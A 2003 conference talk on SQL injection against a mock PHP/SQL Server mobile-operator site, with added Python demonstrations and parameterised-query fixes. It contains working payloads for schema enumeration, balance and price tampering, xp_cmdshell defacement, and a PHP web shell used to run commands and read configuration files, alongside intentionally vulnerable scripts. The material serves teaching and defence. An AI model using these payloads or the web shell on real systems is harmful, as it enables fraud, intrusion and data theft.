© Rafael San Miguel Carrasco
SQL Injection
FIST Conference, October 2003
Environment:

Windows 2000 Professional
Apache Win32 1.3.28
PHP 4.3.3
SQL Server 2000
HTML documents and PHP scripts
Scenario: a mobile operator with online services:

balance enquiry
subscription to telephone services

Access is through a secret identifier assigned to each customer, which is used both to look up information and as the means of payment.
consultasaldo.php:

<?php
// $idcliente comes straight from the request and is concatenated into the query text:
// no escaping, no parameter binding, and the driver warning is echoed back to the browser.
$query = "SELECT nombre, apellidos, saldo FROM clientes WHERE id='$idcliente';";
$result = mssql_query($query);
$nfilas = mssql_num_rows($result);
while ($row = mssql_fetch_array($result)) {
    echo "Nombre del cliente: <b>" . $row[0] . " " . $row[1] . "</b><br>";
    echo "Saldo actual: <b>" . $row[2] . "</b>";
}
?>
contratar.php:

<?php
// $idservicio and $idcliente come from the request and are concatenated into every query.
$query = "SELECT * FROM servicios WHERE id='$idservicio';";
$result = mssql_query($query);
$row = mssql_fetch_array($result);
$precio = $row[3];
echo "El precio del servicio que desea contratar es de <b>$precio</b> euros<br>";
$saldo_final = $saldo_actual - $precio;
// The balance is debited first ...
$query = "UPDATE clientes SET saldo=$saldo_final WHERE id='$idcliente';";
mssql_query($query);
// ... then the flag column servicio<N> is set; note that $idservicio is spliced into the column name itself.
$query = "UPDATE clientes SET servicio" . $idservicio . "=1 WHERE id='$idcliente';";
mssql_query($query);
?>
Mapping the database:

the tables that make up the database
the list and type of the columns of each table
5' AND 1=0 union select TABLE_NAME from INFORMATION_SCHEMA.TABLES--

Warning: mssql_query(): message: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. (severity 16) in c:\apache\htdocs\consultasaldo.php on line 21

The original SELECT returns three columns (nombre, apellidos, saldo), so the injected SELECT must return three as well. AND 1=0 empties the legitimate result so that only the injected rows come back, and the trailing -- comments out the closing quote and semicolon of the original query. The driver warning, echoed to the browser, tells the attacker exactly how to adjust the payload: padding with two constants makes the column counts match.

5' AND 1=0 union select TABLE_NAME," ",1 from INFORMATION_SCHEMA.TABLES--
5' AND 1=0 union select TABLE_NAME, COLUMN_NAME,1 from INFORMATION_SCHEMA.COLUMNS

5' AND 1=0 union select TABLE_NAME, COLUMN_NAME,type from syscolumns, INFORMATION_SCHEMA.COLUMNS--

The second query lists syscolumns and INFORMATION_SCHEMA.COLUMNS with no join condition, so it returns the cross product of the two rather than one row per column. INFORMATION_SCHEMA.COLUMNS already exposes the type name in its DATA_TYPE column, which needs no second table.
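As an added example (not code from the talk), the query construction of consultasaldo.php and the UNION column-count probing above, reproduced in Python against an in-memory SQLite database. SQLite stands in for SQL Server 2000 and sqlite_master for INFORMATION_SCHEMA.TABLES; the clientes/servicios rows are constructed. find_union_width generalises the one-column/three-column probing on the slides by trying widths until the engine accepts the UNION, enumerate_tables then sends the padded payload, and consulta_saldo_segura is the parameterised counterpart that the same payload does not affect.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the scenario's tables (SQLite in place of SQL Server 2000).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE clientes (id TEXT, nombre TEXT, apellidos TEXT, saldo INTEGER)")
    con.execute("CREATE TABLE servicios (id TEXT, nombre_servicio TEXT, descripcion TEXT, precio INTEGER)")
    con.execute("INSERT INTO clientes VALUES ('5', 'Ana', 'Lopez', 120)")
    con.execute("INSERT INTO servicios VALUES ('1', 'llamada en espera', 'call waiting', 3)")
    return con


def consulta_saldo_vulnerable(con, idcliente: str):
    # Same construction as consultasaldo.php: the request value is pasted into the SQL text.
    query = f"SELECT nombre, apellidos, saldo FROM clientes WHERE id='{idcliente}';"
    return con.execute(query).fetchall()


def consulta_saldo_segura(con, idcliente: str):
    # Bound parameter: the value is data, never parsed as SQL, whatever characters it contains.
    query = "SELECT nombre, apellidos, saldo FROM clientes WHERE id=?;"
    return con.execute(query, (idcliente,)).fetchall()


def find_union_width(con, max_cols: int = 10):
    """Append a UNION with n literal columns until the engine stops complaining about
    the column count; SQL Server's message 205 plays the same role as SQLite's error here."""
    for n in range(1, max_cols + 1):
        payload = "5' AND 1=0 UNION SELECT " + ",".join(["1"] * n) + "--"
        try:
            consulta_saldo_vulnerable(con, payload)
            return n
        except sqlite3.OperationalError as err:
            if "same number of result columns" not in str(err):
                raise  # a different error means the payload itself is malformed
    return None


def enumerate_tables(con):
    """The slides' padded payload: the table name plus filler columns up to the discovered width."""
    width = find_union_width(con)
    filler = ",".join(["1"] * (width - 1))
    payload = f"5' AND 1=0 UNION SELECT name,{filler} FROM sqlite_master WHERE type='table'--"
    return sorted(row[0] for row in consulta_saldo_vulnerable(con, payload))


if __name__ == "__main__":
    db = make_db()
    print("width:", find_union_width(db))          # 3
    print("tables:", enumerate_tables(db))         # ['clientes', 'servicios']
    print("safe:", consulta_saldo_segura(db, "5' AND 1=0 UNION SELECT name,1,1 FROM sqlite_master--"))  # []
```

SQLite accepts any literal types in the padding columns; on SQL Server the filler must be convertible to the type of the column it lines up with, which is why the slides pad the string columns with " " and the numeric saldo column with 1.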
5' AND 1=0; update clientes set saldo=500000 where id=5555--

The semicolon closes the SELECT and starts a second statement in the same batch; SQL Server runs the whole batch, so the UPDATE executes even though the SELECT itself returns nothing.
5556'; update servicios set precio=1 where nombre_servicio="llamada en espera"—

Warning: mssql_query(): message: Line 1: Incorrect syntax near '—'. (severity 15) in c:\apache\htdocs\contratar.php on line 22

Warning: mssql_query(): message: Unclosed quotation mark before the character string ';'. (severity 15) in c:\apache\htdocs\contratar.php on line 22

SQL Server is rejecting the typographic dash at the end of the payload: the comment terminator must be two ASCII hyphens (--). Because the dash is not a comment, the quote and semicolon left over from the original query are parsed as well, which is the second warning.
5' AND 1=0; exec master..xp_cmdshell 'echo "<html> <body><img src=http://www.geocities.com/clan_de_vampiros/Caminante.gif> <br>hackedwebpage!</body></html>" > c:\apache\htdocs\deface.htm'--

5556'; exec master..xp_cmdshell 'copy c:\apache\htdocs\deface.htm c:\apache\htdocs\principal.htm'--

xp_cmdshell runs the command with the privileges of the SQL Server service account; in SQL Server 2000 it is available by default to members of sysadmin, so a web application that connects as sa turns any injection point into command execution on the database host. The first statement writes a defacement page into the Apache document root, the second copies it over the site's front page (principal.htm).
shell.php:

<html><body>
<?php
// Minimal web shell: runs the value of the "comando" query parameter on the server and returns its output.
$comando = $_GET["comando"];
echo "$comando<br>";
$resultado = system($comando);
echo $resultado;
?>
</body></html>

Alternatively: passthru()
5556'; exec master..xp_cmdshell 'echo "<html><body><?php $comando=$_GET["comando"];echo $comando;$resultado = system ($comando);echo $resultado;?></body></html>" > c:\apache\htdocs\shell.php'--

Once shell.php has been written into the document root, commands are issued through the browser:

http://127.0.0.1/shell.php?comando=dir..

http://127.0.0.1/shell.php?comando=type c:\odbc.conf
In php.ini:

; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = On / Off

With magic_quotes_gpc = On, PHP backslash-escapes quotes in every GET/POST/Cookie value before the script sees it. With numeric fields, however, this protection is useless: a value spliced into the query without surrounding quotes contains nothing to escape, so an input such as 5 OR 1=1 reaches the database intact. It is also the wrong escaping for SQL Server, whose string literals do not treat a backslash as an escape character (a quote inside a T-SQL literal is written doubled, ''), so a backslash in front of the injected quote does not stop that quote from closing the literal. Magic quotes were deprecated in PHP 5.3 and removed in 5.4; the fix is to keep user input out of the query text altogether, binding it as a parameter (with the mssql extension of this era, through stored procedures called via mssql_init()/mssql_bind()/mssql_execute()).
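Added example (not from the slides) of the magic_quotes_gpc point, in Python against an in-memory SQLite database standing in for SQL Server. addslashes reproduces what magic_quotes_gpc = On did to request values; saldo_por_id is the quoted consultasaldo.php lookup, and clientes_con_saldo_minimo is a hypothetical numeric lookup that is not on the slides. The escaped quote still injects in the quoted case because SQLite, like T-SQL, gives a backslash no special meaning inside a string literal, and the numeric case is untouched because there is nothing to escape; the _param variants show the parameterised form that defeats both.

```python
import sqlite3


def addslashes(value: str) -> str:
    """What magic_quotes_gpc=On applied to every GET/POST/Cookie value: PHP's addslashes()."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"')
                 .replace("\0", "\\0"))


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the clientes table (SQLite in place of SQL Server 2000).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE clientes (id TEXT, nombre TEXT, apellidos TEXT, saldo INTEGER)")
    con.executemany("INSERT INTO clientes VALUES (?,?,?,?)",
                    [("5", "Ana", "Lopez", 120), ("5555", "Luis", "Perez", 40)])
    return con


def saldo_por_id(con, idcliente: str):
    # consultasaldo.php pattern with magic quotes on: the escaped value sits between single quotes.
    # The backslash is an ordinary character to the engine, so the quote still closes the literal.
    q = f"SELECT nombre, apellidos, saldo FROM clientes WHERE id='{addslashes(idcliente)}';"
    return con.execute(q).fetchall()


def clientes_con_saldo_minimo(con, minimo: str):
    # Hypothetical numeric lookup, not on the slides: the value is used without quotes,
    # so addslashes has nothing to escape and the input is parsed as SQL.
    q = f"SELECT nombre FROM clientes WHERE saldo >= {addslashes(minimo)};"
    return [r[0] for r in con.execute(q)]


def saldo_por_id_param(con, idcliente: str):
    # Bound parameter: the whole input is compared as one value, never parsed.
    q = "SELECT nombre, apellidos, saldo FROM clientes WHERE id=?;"
    return con.execute(q, (idcliente,)).fetchall()


def clientes_con_saldo_minimo_param(con, minimo: str):
    n = int(minimo)  # numeric field: enforce the type first (raises ValueError on "1000 OR 1=1"), then bind
    return [r[0] for r in con.execute("SELECT nombre FROM clientes WHERE saldo >= ?;", (n,))]


if __name__ == "__main__":
    db = make_db()
    payload = "5' AND 1=0 UNION SELECT name,type,1 FROM sqlite_master--"
    print("quoted + addslashes:", saldo_por_id(db, payload))            # [('clientes', 'table', 1)]
    print("numeric + addslashes:", clientes_con_saldo_minimo(db, "1000 OR 1=1"))  # ['Ana', 'Luis']
    print("quoted, bound:", saldo_por_id_param(db, payload))            # []
```

The numeric payload carries no quote at all, which is the slide's point; against an engine that uses backslash escapes (MySQL) the quoted case would be blocked, but neither SQLite nor T-SQL does, so on this stack magic quotes stop neither attack.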
Madrid, 25 October 2003